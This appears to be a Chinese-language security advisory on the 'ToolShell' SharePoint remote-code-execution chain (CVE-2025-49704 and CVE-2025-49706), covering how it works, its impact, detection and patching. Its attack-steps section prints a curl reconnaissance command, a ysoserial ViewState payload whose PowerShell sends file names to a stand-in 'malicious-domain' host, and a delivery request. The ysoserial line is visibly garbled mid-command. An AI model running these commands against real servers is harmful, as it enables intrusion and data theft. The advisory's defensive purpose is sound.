工具链漏洞预警:全球活跃利用中的SharePoint新型零日RCE攻击链
字数 1391 2025-08-30 06:50:27
SharePoint新型零日RCE攻击链(ToolShell)技术分析与防御指南
漏洞概述
2025年7月18日,Eye Security安全团队发现一起大规模利用Microsoft SharePoint远程代码执行(RCE)漏洞链的攻击活动,该漏洞链被命名为"ToolShell"。攻击者通过组合利用两个关键漏洞(CVE-2025-49704和CVE-2025-49706),可在无需认证的情况下完全控制本地部署的SharePoint服务器。
漏洞技术细节
漏洞链组成
-
CVE-2025-49706 (CVSS 6.3)
- 类型:SharePoint服务器欺骗漏洞
- 作用:为后续攻击提供基础条件
-
CVE-2025-49704 (CVSS 8.8)
- 类型:通过ToolPane端点触发的SharePoint RCE漏洞
- 关键路径:
/_layouts/15/ToolPane.aspx - 特点:无需任何认证即可利用
攻击原理
攻击基于Code White GmbH曾在Pwn2Own上演示的概念验证代码,现已被完全武器化。攻击流程如下:
- 攻击者向
/_layouts/15/ToolPane.aspx发送特制POST请求 - 植入隐蔽的ASPX恶意负载(spinstall0.aspx)
- 恶意负载窃取SharePoint服务器的MachineKey配置(包括ValidationKey和DecryptionKey)
- 利用获取的密钥生成有效的__VIEWSTATE令牌
- 通过ysoserial等工具签署恶意负载实现完全远程代码执行
攻击手法详解
关键攻击步骤
-
获取VIEWSTATEGENERATOR值
curl -s https://target/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+' -
生成viewstate攻击负载
ysoserial.exe -p ViewState -g TypeConfuseDelegate \ -c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://malicious-domain/?f=' + [uri]::EscapeDataString($_.Name)generator="<VIEWSTATE_GENERATOR>" \ --validationkey="<VALIDATION_KEY>" \ --validationalg="<VALIDATION_ALG>" \ --islegacy \ --minify -
执行RCE攻击
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>
攻击特征
- 恶意ASPX文件:spinstall0.aspx
- 攻击IP示例:96.9.125.147
- 攻击行为:
- 通过PowerShell投放恶意ASPX负载
- 窃取机器密钥建立持久化访问
- 从可疑IP执行攻击模块
影响范围
- 影响所有本地部署的SharePoint服务器
- Eye Security扫描发现:8000余台暴露在公网的SharePoint服务器中已有数十台被入侵
- 攻击仍在持续进行中(截至2025年7月19日)
检测方法
-
检查系统是否存在以下特征
- 检查
/ToolPane.aspx和/spinstall0.aspx路径是否存在异常 - 监控160字节的独特响应特征
- 检查加密密钥是否泄露
- 检查
-
监控异常活动
- HTTP(S)外联连接
- 反向Shell活动
- 可疑的PowerShell执行记录
防御措施
紧急措施
-
安装补丁
- 立即安装微软7月补丁星期二发布的最新SharePoint更新
-
密钥管理
- 检查加密密钥是否泄露
- 如已失窃需立即重新生成所有密钥
-
系统检查
- 全面扫描系统入侵痕迹
- 重点关注
/_layouts/15/ToolPane.aspx和/spinstall0.aspx路径
长期防护建议
-
网络防护
- 限制SharePoint服务器的公网暴露
- 实施严格的网络访问控制
-
监控与响应
- 建立完善的日志监控机制
- 设置异常行为告警
-
安全加固
- 定期更新和补丁管理
- 实施最小权限原则
- 定期进行安全审计和渗透测试
参考资源
- 微软官方安全指南
- Eye Security完整技术报告
- Palo Alto Networks Unit 42威胁情报